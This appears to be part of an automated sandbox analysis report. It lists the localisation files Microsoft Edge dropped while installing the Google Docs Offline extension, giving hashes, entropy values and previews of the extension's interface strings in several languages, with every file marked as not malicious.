                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):968
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                          MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                          SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                          SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                          SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                          MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1305
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):911
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):939
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):972
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
